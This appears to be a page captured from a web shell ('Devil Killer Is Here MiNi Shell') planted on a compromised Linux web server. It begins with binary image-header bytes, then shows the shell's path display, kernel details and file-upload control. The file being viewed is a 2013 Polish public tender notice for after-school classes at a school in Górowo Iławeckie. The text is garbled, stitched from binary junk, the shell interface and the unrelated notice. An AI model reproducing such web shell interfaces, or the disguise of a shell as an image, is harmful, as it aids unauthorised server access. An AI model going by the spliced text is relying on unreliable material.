JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130912/370148-N-2013.html

<p class="kh_header"><b>Górowo Iławeckie: na świadczenie usług poszerzenia oferty edukacyjnej o zajęcia wyrównawcze, rozwijające i specjalistyczne oraz wdrożenie nowych innowacyjnych form nauczania</b><br>
<b>Numer ogłoszenia: 370148 - 2013; data zamieszczenia: 12.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół z Ukraińskim Językiem Nauczania , ul. Szkolna 6, 11-220 Górowo Iławeckie, woj. warmińsko-mazurskie, tel. 089 7611243, faks 089 7611228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szkolazdumka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na świadczenie usług poszerzenia oferty edukacyjnej o zajęcia wyrównawcze, rozwijające i specjalistyczne oraz wdrożenie nowych innowacyjnych form nauczania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza możliwość składania ofert częściowych. Łączna ilość części zamówienia wynosi 44. UWAGA! - w celu zapewnienia możliwości realizacji wszystkich części zamówienia każdy z Wykonawców może złożyć ofertę na NIE WIĘCEJ NIŻ SIEDEM CZĘŚCI ZAMÓWIENIA.

Przedmiotem zamówienia jest świadczenie usług poszerzenia oferty edukacyjnej o zajęcia wyrównawcze, rozwijające i specjalistyczne oraz wdrożenie nowych innowacyjnych form nauczania, w tym przeprowadzenie dodatkowych zajęć pozalekcyjnych:

Zajęcia będą odbywać się w oparciu o podstawę programową - adekwatnie do potrzeb i możliwości poznawczych każdej grupy wiekowej. Na zajęciach wyrównawczych będzie powtarzany program lekcji, aby młodzież mogła przyswoić materiał, którego nie opanowały na lekcjach w celu uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego. Na zajęciach naukowych dla uczniów zdolnych będą realizowane zadania wykraczają poza program nauczania a także przygotowanie uczniów do udziału w konkursach wewnątrzszkolnych i zewnętrznych. Na zajęciach pogłębiających wiedzę z przedmiotów i artystycznych, będą realizowane zadania umożliwiające uczniom rozwój zainteresowań i pasji. Wszystkie zajęcia realizowane będą z wykorzystaniem nowoczesnych narzędzi i metod oraz ICT, takich jak: interaktywne programy komputerowe, zestawy audiowizualne (laptop, komputer stacjonarny, projektor multimedialny, tablica interaktywna), a także przy użyciu tradycyjnych pomocy dydaktycznych w formie: ćwiczeń, książek, scenariuszy itp. 60% wszystkich godzin w ramach tego zadania będzie prowadzonych przy użyciu technik aktywizujących takich jak: (m.in.: burza mózgów, gra symulacyjna, drama, meta-plan, eksperyment, drzewo decyzyjne i inne).   
Przynajmniej 20 % każdych zajęć będzie przeznaczonych na wykorzystania wiedzy w praktyce oraz korzystanie ze zdobytych informacji (np. testy, ćwiczenia terenowe, doświadczenia).
Zajęcia odbywać się będą w  grupach:
- 9 grup zajęć wyrównawczych z matematyki : (grupa 1- 10 osób z klasy I gimnazjum; grupa 2 - 10 osób z klasy II gimnazjum; grupa 3 - 10 osób z klasy III gimnazjum; grupa 4  - 10 osób z klasy I a liceum; grupa 5  - 10 osób z klasy I b liceum; grupa 6 - 10 osób z klasy II a liceum; grupa 7  - 10 osób z klasy II b liceum; grupa 8 - 10 osób z klasy III a liceum; grupa 9  - 10 osób z klasy III b liceum);
- 4 grupy zajęć wyrównawczych z języka polskiego : (grupa 1- 6 osób z klasy I gimnazjum; grupa 2 - 6 osób z klasy II gimnazjum; grupa 3 - 6 osób z klasy III gimnazjum; grupa 4 - 12 osób z klas III a i b liceum).

- 6 grup zajęć wyrównawczych z języka angielskiego: (grupa 1 - 5 osób z klasy I gimnazjum; grupa 2- 5 osób z klasy II gimnazjum; grupa 3 - 5 osób z klasy III gimnazjum; grupa 4 - 8 osób z klas I a i b liceum; grupa 5  - 8 osób z klas II a i b liceum; grupa 6 - 8 osób z klas III a i b liceum).

- 3 grupy zajęć wyrównawczych z języka niemieckiego: (grupa 1 -5 osób z klasy I a i b liceum, grupa 2- 5 osób z klasy II a i b liceum, grupa 3- 5 osób z klasy III a i b liceum);
- 3 grupy zajęć wyrównawczych z języka ukraińskiego (grupa 1 -5 osób z klasy I gimnazjum, grupa 2 - 5 osób z klasy II gimnazjum, grupa 3- 5 osób z klasy III gimnazjum);
- 1 grupa zajęć wyrównawczych z biologii (12 osób z klas III a i b liceum);
- 1 grupa zajęć wyrównawczych z geografii (12 osób z klas z klas III a i b liceum);
- 1 grupa zajęć wyrównawczych z WOS (12 osób z klas III a i b liceum);
- 1 grupa zajęć wyrównawczych z historii (8 osób z klas III a i b liceum);
- 1 grupa zajęć matematycznych dla uczniów zdolnych (12 osób z klas I-III liceum)
- 1 grupa zajęć informatycznych dla uczniów zdolnych (10 osób z klas I-III gimnazjum i I-III liceum);
- 2 grupy zajęć z języka angielskiego dla uczniów zdolnych (  grupa 1 - 6 osób z klas I-III gimnazjum, grupa 2- 8 osób z klas  I-III liceum);
- 2 grupy zajęć z języka niemieckiego dla uczniów zdolnych (grupa 1 od 2 do 5 osób z klas I-III gimnazjum, grupa 2 od 4 do 8 osób klas I-III liceum);
- 1 grupa zajęć -koło przyrodniczo-turystycznych (10 osób z klas I-III gimnazjum i I-III liceum);
- 1 grupa  zajęć   fizycznych (od 5 do 8 osób z klas I-III liceum);
- 1 grupa zajęć   chemicznych  (od 5 do 8 osób z klas I-III liceum);
- 1 grupa zajęć z języka ukraińskiego (10 osób z klas I-III liceum);
- 1 grupa zajęć filmowych (8 osób z klas I-III gimnazjum i I-III liceum);
- 2 grupy zajęć artystycznych (1 grupa zajęć wokalno-tanecznych 24 osoby z klas I-III gimnazjum i I-III liceum, grupa 2 zajęć plastycznych -12 osób z klas I-III gimnazjum i I-III liceum);
- Indywidualne wsparcie terapeutyczne;
- Indywidualne wsparcie psychologiczne.
Zajęcia wyrównawcze z matematyki mają na celu wyrównywanie braków w wiadomościach i umiejętnościach matematycznych, uzyskanie odpowiedniego poziomu rozumowania operacyjnego, rozwijanie wyobraźni ucznia, umiejętności logicznego myślenia oraz udoskonalenie pamięci, spostrzegawczości i orientacji przestrzennej a także kształcenie umiejętności do uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego. 
Zajęcia wyrównawcze z języka polskiego mają na celu wyrównanie braków w wiadomościach, doskonalenie u uczniów umiejętności językowych w zakresie sprawności mówienia, słuchania, czytania i pisania, zwiększenie zasobu słownictwa a także motywowanie uczniów do samodzielnej pracy a także kształcenie umiejętności do uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego.
Zajęcia wyrównawcze z języka angielskiego mają na celu wyrównanie braków w wiadomościach, doskonalenie u uczniów umiejętności językowych w zakresie sprawności mówienia, słuchania, czytania i pisania, zwiększenie zasobu słownictwa oraz kształtowanie poczucia pewności siebie przy komunikacji z użyciem języka angielskiego a także  kształcenie umiejętności do uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego. 
Zajęcia wyrównawcze z języka niemieckiego mają na celu wyrównanie braków w wiadomościach, doskonalenie u uczniów umiejętności językowych w zakresie sprawności mówienia, słuchania, czytania i pisania, zwiększenie zasobu słownictwa oraz kształtowanie poczucia pewności siebie przy komunikacji z użyciem języka niemieckiego a także  kształcenie umiejętności do uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego.
Zajęcia wyrównawcze z języka ukraińskiego mają na celu wyrównanie braków w wiadomościach, doskonalenie u uczniów umiejętności językowych w zakresie sprawności mówienia, słuchania, czytania i pisania, zwiększenie zasobu słownictwa a także motywowanie uczniów do samodzielnej pracy a także kształcenie umiejętności do uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego.
Zajęcia wyrównawcze z biologii, geografii, WOS, historii mają na celu wyrównanie braków edukacyjnych oraz rozwinięcie wiedzy i umiejętności z zakresu biologii , geografia  WOS , historii a także  kształcenie umiejętności do uzyskania odpowiedniego poziomu umożliwiającego zdanie egzaminu zewnętrznego.
Zajęcia matematycznie dla uczniów zdolnych mają na celu wsparcie uczniów zdolnych, którzy swoją wiedzą wykraczają poza program nauczania a także przygotowanie uczniów do udziału w konkursach wewnątrzszkolnych i zewnętrznych. Zajęcia powinny obejmować materiał wykraczający poza działy programowe narzucone dla lekcji matematyki. Program koła matematycznego powinien zapewnić uczniom zdobycie umiejętności i wiadomości w zakresie kompetencji matematycznych oraz ich praktyczne wykorzystywanie w codziennych sytuacjach.
Zajęcia informatyczne dla uczniów zdolnych mają na celu wsparcie uczniów zdolnych, którzy swoją wiedzą wykraczają poza program nauczania a także przygotowanie i prowadzenie strony internetowej z realizacji projektu, przygotowanie prezentacji multimedialnej z realizacji projektu, kształtowanie umiejętności podwajające na sprawne i skuteczne przygotowanie się do konkursów i olimpiad. Zajęcia obejmują materiał wykraczający poza działy programowe narzucone dla lekcji informatyki. Program koła informatycznego powinien zapewnić uczniom zdobycie umiejętności i wiadomości w zakresie ICT oraz ich praktyczne wykorzystywanie w codziennych sytuacjach, nauczą samodzielnego dokształcania, sprawnego wyszukiwania wiadomości dodatkowych potrzebnych do innych przedmiotów.
Zajęcia z języka angielskiego dla uczniów zdolnych mają na celu wsparcie uczniów zdolnych, którzy swoją wiedzą wykraczają poza program nauczania a także przygotowanie uczniów do udziału w konkursach wewnątrzszkolnych i zewnętrznych, opracowanie i przygotowanie folderu obcojęzycznego w języku: polskim - ukraińskim- angielskim. Zajęcia powinny obejmować materiał wykraczający poza działy programowe narzucone dla lekcji języka angielskiego, powinny  podnieść umiejętności porozumiewania się w języku angielskim, usprawniające gramatykę i fonetykę, poszerzające słownictwo.
Zajęcia z języka niemieckiego dla uczniów zdolnych mają na celu wsparcie uczniów zdolnych, którzy swoją wiedzą wykraczają poza program nauczania a także przygotowanie uczniów do udziału w konkursach wewnątrzszkolnych i zewnętrznych, opracowanie i przygotowanie folderu obcojęzycznego w języku: polskim - ukraińskim- niemieckim Zajęcia powinny obejmować materiał wykraczający poza działy programowe narzucone dla lekcji języka niemieckiego, powinny  podnieść umiejętności porozumiewania się w języku niemieckim, usprawniające gramatykę i fonetykę, poszerzające słownictwo.
Zajęcia przyrodniczo-turystyczne mają na celu rozwój zainteresowań oraz zdobycie przez uczniów umiejętności i wiadomości o otaczającym świecie oraz ich praktyczne wykorzystywanie w codziennych sytuacjach. Uczniowie pogłębią wiedzę z przyrody, zajęcia będą realizowane  w oparciu o środowisko audio-wizualne i w terenie.
Zajęcia fizyczne - zajęcia mają na celu rozbudzenie głębszych zainteresowań fizyką. Celem zajęć jest: kształtowanie umiejętności obserwacji i opisu zjawisk fizycznych, rozbudzenie pasji badawczej, przygotowanie uczniów do udziału w konkursach wewnątrzszkolnych i zewnętrznych.  
Zajęcia chemiczne - zajęcia mają na celu rozbudzenie głębszych zainteresowań chemią. Uczniowie będą przeprowadzali eksperymenty przy użyciu odpowiednich przyrządów, rozwiązywali problemy teoretyczne i praktyczne związane z wykładanym przedmiotem.
Zajęcia języka ukraińskiego - mają na celu doskonalenie u uczniów umiejętności językowych w zakresie sprawności mówienia, słuchania, czytania i pisania, zwiększenie zasobu słownictwa a także motywowanie uczniów do samodzielnej pracy, przygotowanie do konkursów wewnątrzszkolnych i konkursów zewnętrznych, prowadzenie kroniki z przebiegu projektu.
Zajęcia filmowe - podczas zajęć uczestnicy poznają, od strony praktycznej, warsztat artysty filmowego i fotografika oraz będą mieli możliwość konsultowania i realizowania własnych pomysłów filmowych lub projektów fotograficznych. Wiedza i umiejętności zdobyte w trakcie zajęć poszerzą horyzonty uczestników, a także pogłębią ich wrażliwość estetyczną i rozumienie sztuki. Podczas zajęć uczniowie będą nagrywać filmy o szkole,  teledyski, you tube i film z realizacji projektu.
Zajęcia wokalno-taneczne mają na celu umożliwienie uczniom nauki śpiewu i ukraińskiego tańca ludowego, doskonalenie ekspresji ruchowej a także  przygotowanie 2 prezentacji wokalno - tanecznych na forum lokalnym, 4 regionalnym, 2 wewnątrzszkolnym.
Zajęcia plastyczne - mają na celu rozwój świadomości i ekspresji kulturowej uczniów poprzez rozwój kreatywności, wrażliwości odbioru dzieł sztuki, umiejętności wyrażenia siebie w środowisku artystycznym. Efektem realizacji działania jest: przygotowanie galerii prac plastycznych z malarstwa na płótnie i papierze, wystawa fotograficzna.
Produkty: 

- 912 godzin wyrównawczych z matematyki w klasach I-III gimnazjum i I-II liceum, (7 wyrównawczych 12 godz. tyg.*76 tyg.)
- 240 godzin wyrównawczych z matematyki w klasach III liceum ( 2 wyrównawcze 4 godz. tyg. *60 tyg.);
- 228 godzin wyrównawczych z j. polskiego w kl. I-III gimnazjum, (3 wyrównawcze 3 godz. tyg.*76 tyg.);
- 60 godzin wyrównawczych z języka polskiego w kl. III liceum,(1 wyrównawcza 1 godz. tyg.*60 tyg.);
- 380 godzin wyrównawczych z języka angielskiego w kl. I- III gimnazjum i I-II liceum,(5 wyrównawczych 5 godz. tyg.*76 tyg.);
- 60 godzin wyrównawczych z języka angielskiego w kl. III liceum,(1 wyrównawcza  1 godz.tyg.*60 tyg.);
- 152 godziny wyrównawczych z języka niemieckiego w kl. I-II liceum,(2 wyrównawcze  2 godz.tyg.*76 tyg.);
- 60 godzin wyrównawczych z języka niemieckiego w kl. III liceum,(1 wyrównawcza 1 godz.tyg.*60 tyg.);
- 228 godzin wyrównawczych z języka ukraińskiego  w kl. I- III gimnazjum,                  (3 wyrównawcze 3 godz.tyg.*76 tyg.);
- 60 godzin wyrównawczych z biologii w kl. III liceum (1 wyrównawcza 1 godz.tyg.*60 tyg.);
- 60 godzin wyrównawczych z geografii w kl. III liceum (1 wyrównawcza 1 godz.tyg.*60 tyg.);
- 60 godzin wyrównawczych z WOS w kl. III liceum (1 wyrównawcza 1 godz.tyg.*60 tyg.);
- 60 godzin wyrównawczych z historii w kl. III liceum (1 wyrównawcza 1 godz.tyg.*60 tyg.);
- 152 godziny matematyki dla uczniów zdolnych w klasach I-III liceum (1 kółko 2 godz. tyg. *76 tyg.);
- 152 godziny informatyki dla uczniów zdolnych w gimnazjum i liceum ( 1 kółko 2 godz. tyg. *76 tyg.);
- 152 godziny języka angielskiego dla uczniów zdolnych w gimnazjum i liceum (2 kółka 2 godz. tyg. *76 tyg.);
- 152 godziny języka niemieckiego dla uczniów zdolnych w gimnazjum i liceum (2 kółka 2 godz. tyg. *76 tyg.);
- 76 godzin zajęć  przyrodniczo-turystycznych dla gimnazjum i liceum (1 kółko 1 godz. tyg. *76 tyg.);
- 76 godzin zajęć  fizycznych liceum (1 kółko 1 godz. tyg. *76 tyg.);
- 76 godzin zajęć  fizycznych liceum (1 kółko 1 godz. tyg. *76 tyg.);
- 152 godziny języka ukraińskiego dla klas I-III liceum (1 kółko 1 godz. tyg. *76 tyg.);
- 76 godzin zajęć filmowych dla gimnazjum i liceum (1 kółko 1 godz. tyg. *76 tyg.);
- 228 godzin zajęć wokalno - tanecznych dla gimnazjum i liceum ( 1 kółko 3 godz. tyg. *76 tyg.);
- 228 godzin zajęć plastycznych dla gimnazjum i liceum (1 kółko 3 godz. tyg. *76 tyg.);
- 152 godziny indywidualnego wsparcia terapeutycznego (2 godz. tyg. *76 tyg.); 
- 228 godzin indywidualnego wsparcia psychologicznego (3 godz. tyg. *76 tyg.)

Zamawiający nieodpłatnie udostępni pomieszczenia, w których prowadzone będą zajęcia na terenie Zespołu Szkół..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 44.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wspólny dla części od 1 do 39 zamówienia włącznie oraz dla części 43 i 44 zamówienia:
Każda z osób odpowiedzialnych za świadczenie usług winna posiadać znajomość języka ukraińskiego potwierdzoną:
- dyplomem ukończenia studiów wyższych na kierunku filologia w specjalności języka ukraińskiego i/lub
- dyplomem ukończenia nauczycielskiego kolegium języków obcych w specjalności języka ukraińskiego i/lub
- świadectwem znajomości języka ukraińskiego. wydanym na podstawie art. 11 ust. 3 ustawy z 6 stycznia 2005 r. o mniejszościach narodowych i etnicznych oraz o języku regionalnym (Dz. U. rur 17, poz. 141, i nr 62, poz. 550) i/lub
- zaświadczeniem wydanym przez organizację społeczną mniejszości narodowej, etnicznej lub społeczności posługującej się językiem regionalnym lub zaświadczenie potwierdzające ukończenie kursu podstawy komunikacji w języku ukraińskim co najmniej wydane przez Warmińsko-Mazurski Ośrodek Doskonalenia  Nauczycieli;
oraz ponadto spełniać następujące warunki:
- wykształcenie minimum wyższe magisterskie z przygotowaniem pedagogicznym  o kierunku zgodnym z przedmiotem danej części zamówienia,
- kwalifikacje uprawniające do nauczania w szkole gimnazjalnej   lub ponadgimnazjalnej kończącej się egzaminem oraz stopień nauczyciela minimum kontraktowego o kierunku nauczania zgodnym z daną częścią zamówienia,
- minimum 3 letni w ostatnich 5 latach staż pracy w nauczaniu zgodnym z daną częścią zamówienia w placówce oświatowej na poziomie szkoły gimnazjalnej lub ponadgimnazjalnej  kończącej się egzaminem.

Warunki udziału w postępowaniu dla pozostałych części:

Część 40.
Zajęcia filmowe dla uczniów gimnazjum i liceum.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje i/lub będzie dysponował co najmniej jedną osobą spełniającą łącznie następujące warunki: posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, doświadczenie polegające na zrealizowaniu minimum jednych zajęć z młodzieżą szkolną obejmujące zajęcia filmowe odpowiadające zakresem i długością trwania minimum danej części zamówienia.

Część 41.
Zajęcia wokalno-taneczne dla uczniów gimnazjum i liceum.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje i/lub będzie dysponował co najmniej jedną osobą spełniającą łącznie następujące warunki: posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,  oraz minimum 3 letnie doświadczenie w ostatnich 5 latach pracy w lub z zespołami ludowymi.

Część 42.
Zajęcia plastyczne  dla uczniów gimnazjum i liceum.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje i/lub będzie dysponował co najmniej jedną osobą spełniającą łącznie następujące warunki: posiada wykształcenie plastyczne minimum 3 letnie doświadczenie w pracy  z młodzieżą w zakresie zgodnym z daną częścią zamówienia.

Część 43.
Indywidualne wsparcie terapeutyczne.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje i/lub będzie dysponował co najmniej jedną osobą spełniającą łącznie następujące warunki: posiada wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, minimum 5 staż pracy z młodzieżą szkolną w placówce oświatowej na poziomie szkoły co najmniej gimnazjalnej.



Część 44.
Indywidualne wsparcie psychologiczne.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje i/lub będzie dysponował co najmniej jedną osobą spełniającą łącznie następujące warunki: posiada wykształcenie wyższe magisterskie - psychologiczne z przygotowaniem pedagogicznym w specjalności psychologia dzieci i młodzieży,  minimum roczny  staż pracy  na stanowisku pedagoga/psychologa z młodzieżą szkolną w placówce oświatowej na poziomie szkoły co najmniej gimnazjalnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
